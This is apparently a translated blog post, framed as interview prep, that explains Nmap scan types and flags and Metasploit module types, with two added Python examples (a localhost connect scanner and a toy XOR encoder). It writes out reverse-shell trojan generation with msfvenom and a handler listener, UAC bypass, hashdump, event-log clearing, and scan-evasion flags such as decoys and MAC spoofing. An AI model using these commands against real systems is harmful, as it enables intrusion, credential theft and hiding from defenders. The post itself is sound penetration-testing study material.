Nmap and Metasploit common commands
2022-08-03 05:40:00 【A piece of paper - barren】
Preface
Cyber security interview questions
Questions
1. How Nmap works, its commonly used parameters, and the principle behind them
Nmap can determine whether a target host is online, which of its ports are open, which services and versions are running on them, and what operating system and device type the target is.
Principle:
Nmap is a free, open-source network discovery and security auditing tool (originally written for Linux, now also available for Windows and macOS). It uses raw IP packets to discover which hosts are on a network, which services (application name and version) those hosts offer, which operating systems they run, what kind of packet filters/firewalls are in use, and many other characteristics.
First, the port states Nmap reports
The six port states
open: the port is open; an application is accepting TCP connections or UDP datagrams on it
closed: the port is reachable and answers Nmap's probes, but no application is listening on it
filtered: a firewall, IDS/IPS or other packet filter is blocking the probe, so Nmap cannot tell whether the port is open
unfiltered: the port is reachable, but Nmap cannot tell whether it is open or closed (only the ACK scan reports this state; follow up with a SYN or connect scan)
open|filtered: Nmap cannot distinguish open from filtered, because an open port sends no reply to the probe (typical of UDP, IP protocol, FIN, NULL and Xmas scans)
closed|filtered: Nmap cannot distinguish closed from filtered (reported only by the IP ID idle scan, -sI)
Commonly used parameters and what they do:
-sn (older alias -sP): ping scan, host discovery only, no port scan
-p: specify the target port(s) to scan, e.g. -p 22,80,443 or -p 1-1024
-sT/-sS/-sA: TCP connect / TCP SYN / TCP ACK scan
-sU: UDP scan
-O: operating system detection
-sV: service and version detection
-Pn: treat all specified hosts as online and skip host discovery
--dns-servers <serv1[,serv2],...>: use the specified DNS servers for reverse resolution
--system-dns: use the operating system's DNS resolver instead of Nmap's own
--traceroute: trace the route to each host after scanning
--packet-trace: print every packet Nmap sends and receives
How the TCP SYN scan works:
nmap -p 80 -sS [target IP]
Nmap sends a TCP SYN segment to the target port. If the target answers with SYN/ACK, the port is open; Nmap then sends a RST to tear down the half-open connection instead of completing the handshake (hence "half-open" or "stealth" scan; it needs raw-socket privileges, i.e. root). If the target answers with RST/ACK, the port is closed. If nothing comes back after retransmission, or an ICMP unreachable error arrives, the port is reported as filtered.
How the TCP connect scan works:
nmap -p 80 -sT [target IP]
Nmap asks the operating system to connect() to the port, which sends the SYN. If the target answers SYN/ACK, the port is open; the OS completes the three-way handshake with an ACK and Nmap then closes the connection with RST/ACK. Because the handshake completes, the listening application sees the connection and may log it, so -sT is noisier than -sS; it is the scan Nmap falls back to when it lacks raw-socket privileges. If the target answers RST/ACK, the port is closed.
How the TCP ACK scan works:
nmap -p 80 -sA [target IP]
Nmap sends a TCP ACK segment that belongs to no existing connection. Whether the port is open or closed, an unfiltered target replies with RST. If Nmap receives that RST, the port is not blocked by a firewall (unfiltered); if nothing comes back, or an ICMP unreachable error arrives, the port is filtered.
The ACK scan therefore never tells you whether a port is open; it only maps firewall rules (a stateful firewall drops unsolicited ACKs, a simple packet filter lets them through), and is used alongside a SYN scan to judge the state of the target's firewall.
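The three scan types above are described in prose; the following added example (my own code, not part of the original post and not Nmap's code) implements the connect scan with the Python standard library and maps each socket outcome onto the Nmap port states listed earlier. The target is a constructed listener on 127.0.0.1 that the script starts itself; SYN and ACK scans need raw sockets and root, so they are not reproduced here. The thread count and timeout are arbitrary choices, and the `threads` parameter plays the same role as Nmap's parallelism or the THREADS option of Metasploit's TCP port scanner.

```python
"""TCP connect scan (the mechanism behind `nmap -sT`) over localhost.

Added example, not Nmap's own code. Each port is classified with the same
vocabulary Nmap uses: open / closed / filtered.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, Tuple


def classify_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Ask the OS to connect() and map the result to an Nmap-style state.

    connect() returns        -> SYN/ACK came back and the OS finished the
                                three-way handshake: "open"
    ConnectionRefusedError   -> the target answered RST/ACK: "closed"
    timeout / other OSError  -> no reply, or an ICMP unreachable error:
                                "filtered" (something dropped the probe)
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return "open"          # leaving the block closes the connection
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def scan(host: str, ports: Iterable[int], threads: int = 20,
         timeout: float = 1.0) -> Dict[int, str]:
    """Probe many ports in parallel; `threads` plays the role of Nmap's
    parallelism (or THREADS in Metasploit's auxiliary/scanner/portscan/tcp)."""
    port_list = list(ports)
    with ThreadPoolExecutor(max_workers=threads) as pool:
        states = list(pool.map(lambda p: classify_port(host, p, timeout),
                               port_list))
    return dict(zip(port_list, states))


def start_listener(host: str = "127.0.0.1") -> Tuple[int, socket.socket]:
    """Constructed target: a TCP server on an OS-chosen port that accepts and
    immediately closes each connection. Returns (port, server socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:        # caller closed the server socket
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv


def find_closed_port(host: str = "127.0.0.1") -> int:
    """Pick a port nothing listens on: bind to port 0, note it, release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind((host, 0))
        return sock.getsockname()[1]


def demo() -> Dict[int, str]:
    """Scan one open and one closed port on localhost and return the states."""
    host = "127.0.0.1"
    open_port, srv = start_listener(host)
    closed_port = find_closed_port(host)
    try:
        return scan(host, [open_port, closed_port])
    finally:
        srv.close()


if __name__ == "__main__":
    for port, state in sorted(demo().items()):
        print(f"{port}/tcp {state}")
```

Running the script prints one line per port in the same open/closed vocabulary Nmap uses. Note that because connect() completes the handshake, the listener's accept() call actually fires for the open port; that is the visibility cost of -sT that the SYN scan avoids.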
Other functions:
Firewall/IDS evasion techniques
-T<0-5>: timing template (0 = paranoid, slowest; 5 = insane, fastest; 3 is the default)
nmap -T3 x.x.x.x
-D: decoy scan. The scan appears to come from the decoy addresses as well as your real one, so the target cannot easily tell which source is real (put ME in the list to control where your real address appears).
nmap -D RND:3 x.x.x.x   scan with three random decoy IPs
-sI: idle (zombie) scan. Uses an idle host with a predictable IP ID sequence as the apparent source, so the scan is not attributed to your address.
nmap -sI <zombie IP> x.x.x.x
--source-port / -g: source port spoofing (e.g. 53 or 20 to get past naive filters)
--spoof-mac: source MAC spoofing (0 = random MAC; a full address; or a vendor prefix/name)
nmap --spoof-mac 0 x.x.x.x   scan with a random MAC
nmap --spoof-mac aa:bb:cc:dd:ff:ee x.x.x.x   scan with the given MAC
Calling NSE scripts from nmap
Script directory: /usr/share/nmap/scripts/
Parameter: --script
--script vuln   runs the scripts in the vuln category, checking for known vulnerabilities
nmap --script vuln x.x.x.x
--script brute   runs the brute category: simple password brute-forcing against databases, SMB, SNMP and other services
nmap --script brute x.x.x.x
2. Common Metasploit modules and commands
*exploits (exploit modules)
An exploit module is the code component that uses a vulnerability or configuration weakness in a remote target to plant and run a payload, and so gain access to the target system. Common exploit techniques include buffer overflows, web application vulnerabilities and user misconfigurations. The exploits directory holds the proof-of-concept and attack code that attackers or testers have written for specific vulnerabilities; each vulnerability has its own exploit module.
Exploit modules are the core functional component of the Metasploit framework.
*payloads (payload modules)
A payload is the code we want the target system to run once the exploit has succeeded; after a successful compromise it is used to run arbitrary commands or specific code on the target.
Payload modules range from the simplest (adding a user account, providing a command-line shell, controlling the target through a graphical VNC session) to the most complex, Meterpreter, which has a rich set of post-exploitation features. Because exploit and payload are separate, the tester can choose the code that runs after exploitation from many compatible payloads and pick the type of control session they want; this modular, mix-and-match design is a major convenience for the attacker.
*auxiliary (auxiliary modules)
These modules do not establish access between the tester and the target host; they perform scanning, sniffing, fingerprinting and similar supporting functions.
Examples: host discovery, web directory scanning, FTP login brute-forcing
For example, a port scan:
search portscan
use 5   // the TCP scan module; the index depends on the search output, so use auxiliary/scanner/portscan/tcp is the reliable form
show options
set RHOSTS x.x.x.x   // the IP address(es) to scan
set PORTS 1-500   // the port range to scan
set THREADS 20   // number of scan threads; more threads means a faster scan
run
*nops (NOP modules)
A no-operation instruction (NOP) is an instruction that has no real effect on program state. The classic example is the x86 NOP, opcode 0x90.
When building a malicious buffer for an exploit, a NOP sled is usually placed before the actual shellcode. When the exploit fires and control jumps into the buffer, the sled gives a much larger safe landing area, so the shellcode still runs even when memory-address randomization or an imprecise return-address calculation puts the jump slightly off target.
Metasploit's NOP modules generate these NOP sleds for payloads (and can emit varied NOP-equivalent sequences rather than a run of 0x90 bytes), improving the reliability of the exploit.
*encoders (encoder modules)
Encoder modules transform the payload in various ways and serve two purposes: first, to make sure the payload contains no "bad characters" (bytes such as 0x00 that the vulnerable input path would mangle or truncate, e.g. a NUL ending a string copy) that must be avoided during exploitation; second, to obfuscate the payload ("AV evasion") so that antivirus software and IDS/IPS have a harder time detecting and blocking it. In practice the common encoders are well known to modern antivirus, so do not rely on them for evasion; that is what the evasion modules are for.
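The first job of an encoder, removing bad characters, is easy to show concretely. The following added example (my own code, not Metasploit's) implements a single-byte XOR encoding that searches for a key under which neither the key nor any encoded byte is a bad character, and reports the failure case where no such key exists. SAMPLE_PAYLOAD and BAD_CHARS are constructed for the demonstration (the bytes are filler, not shellcode), and the runtime decoder stub that a real encoder prepends to the payload is left out.

```python
"""Single-byte XOR encoding that avoids "bad characters".

Added example: a toy version of the bad-character removal that Metasploit's
encoders perform, not Metasploit's own code. SAMPLE_PAYLOAD is constructed
filler, not shellcode, and the runtime decoder stub is omitted.
"""
from typing import Optional, Tuple

# Typical bad characters: NUL terminates C strings, CR/LF end lines in
# text protocols; a payload containing them would be truncated in transit.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed sample payload that deliberately contains all three bad bytes.
SAMPLE_PAYLOAD = bytes([0x31, 0xC0, 0x50, 0x68, 0x00, 0x2F, 0x73, 0x68,
                        0x0A, 0x0D, 0xFF, 0xE4])


def bad_chars_in(data: bytes, bad: bytes = BAD_CHARS) -> set:
    """Return the set of bad byte values actually present in data."""
    return {b for b in data if b in bad}


def find_xor_key(payload: bytes, bad: bytes = BAD_CHARS) -> Optional[int]:
    """Find a one-byte key such that neither the key (which the decoder stub
    has to embed) nor any encoded byte is a bad character. Key 0 is skipped
    because it leaves the payload unchanged. Returns None if no key works."""
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in payload):
            return key
    return None


def xor_encode(payload: bytes, key: int) -> bytes:
    """XOR every byte with the key."""
    return bytes(b ^ key for b in payload)


# XOR is its own inverse: the decoder stub would run exactly this loop on the
# target to recover the original bytes before jumping to them.
xor_decode = xor_encode


def encode_avoiding(payload: bytes, bad: bytes = BAD_CHARS) -> Tuple[int, bytes]:
    """Encode payload so the result is free of bad characters.

    Raises ValueError when no single-byte key exists (for instance a payload
    that contains every byte value), which is the point at which a real
    exploit needs a multi-byte or different encoding scheme.
    """
    key = find_xor_key(payload, bad)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the bad characters")
    return key, xor_encode(payload, key)


if __name__ == "__main__":
    print("bad bytes in raw payload:", sorted(bad_chars_in(SAMPLE_PAYLOAD)))
    key, encoded = encode_avoiding(SAMPLE_PAYLOAD)
    print(f"key=0x{key:02x} encoded={encoded.hex()}")
    assert xor_decode(encoded, key) == SAMPLE_PAYLOAD
```

The key search is the whole trick: the decoder stub is fixed code, so the only degree of freedom is the key, and a key that maps some payload byte onto a bad character is unusable. For the sample payload the first acceptable key is 0x01; a payload that contains every byte value has no acceptable single-byte key, since whatever key you choose, the byte equal to the key encodes to 0x00.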
*post (post-exploitation modules)
Post modules are used once the target has been exploited and is under remote control: they carry out post-exploitation actions on the compromised system, such as collecting sensitive information, moving laterally, and pivoting attacks through it.
Common Meterpreter commands
*pwd // show the current working directory
*sysinfo // show system information
*getuid // show the user the session is running as
*ps // list the processes running on the target and their PIDs
*kill 2768 // kill the process with PID 2768
*getsystem // attempt to escalate to SYSTEM privileges
*screenshot // capture the target's current screen
*hashdump // dump user names and password hashes (needs SYSTEM privileges)
*shell // drop into a command shell on the target
*upload // upload a file
*download // download a file
*execute // run a file on the target (-f file to run, -i interactive mode, -H hide the window)
*clearev // clear the event logs
*background // put the Meterpreter session in the background (reconnect with sessions -i <id>)
Common commands:
*Commands used from the terminal
msfdb init // initialize the msf database
msfdb delete // delete the msf database and stop using it
msfdb start // start the msf database
msfdb stop // stop the msf database
msfconsole // open the msf console
*Commands used inside the msf console
db_status // check the msf database connection status
db_nmap // run nmap and store the scan results in the database
search // search for modules containing a keyword
use // select a module
show payloads // list the payloads the selected module supports
show options // list the parameters the module needs set
info // show the module's detailed information
set // set a module parameter after selecting the module (unset removes a value)
back // return to the previous context
exploit/run // both commands run the selected module
sessions // list the current sessions (sessions -i <id> interacts with one)
After an exploit module has given you a Meterpreter session:
Manual privilege escalation:
Put the session in the background and use local_exploit_suggester to find usable exploits
background
use post/multi/recon/local_exploit_suggester
show options
set SESSION 4
run
bypassuac (User Account Control) privilege escalation:
search bypassuac
use exploit/windows/local/bypassuac
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 4
run
Then process migration:
A freshly obtained Meterpreter shell is extremely fragile. For example, an attacker may compromise the target through a browser vulnerability, but after exploitation the user may simply close the browser. So the first step is to move the shell into a stable process on the target, binding it to that process without writing anything to disk; this also makes the intrusion harder to detect.
With the automatic migration post module (run post/windows/manage/migrate), the framework picks a suitable process and migrates into it:
run post/windows/manage/migrate
msfvenom (the "venom" tool): generating a Trojan and catching the connection
Generating the Trojan:
64-bit Windows:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f exe > shell.exe
32-bit Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -a x86 --platform Windows -f exe > shell.exe
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f elf > shell.elf
macOS:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx -f macho > shell.macho
Deliver the Trojan to the target host, then set up the listener:
#msfconsole
use exploit/multi/handler   // load the handler module
set payload android/meterpreter/reverse_tcp   // select the payload; it must be the same payload the Trojan was generated with (e.g. windows/x64/meterpreter/reverse_tcp for the shell.exe above), otherwise the session will not be staged correctly
show options   // check the parameters
set LHOST x.x.x.x   // the IP address used when generating the Trojan (Kali's IP)
set LPORT xxx   // the port used when generating the Trojan
exploit   // start listening and wait for the target to connect back
*evasion (evasion modules)
Evasion modules are used to get past checks by Windows Defender antivirus, Windows application control policies (AppLocker) and similar defenses.
Common penetration-testing workflow with Metasploit
1. Scan the target system and look for exploitable vulnerabilities
2. Select and configure an exploit module (exploits)
3. Select and configure a payload module (payloads)
4. Select an encoding technique (encoders) to get past antivirus detection
5. Run the exploit and carry out the post-exploitation phase
Summary
This post mainly introduced Nmap and Metasploit.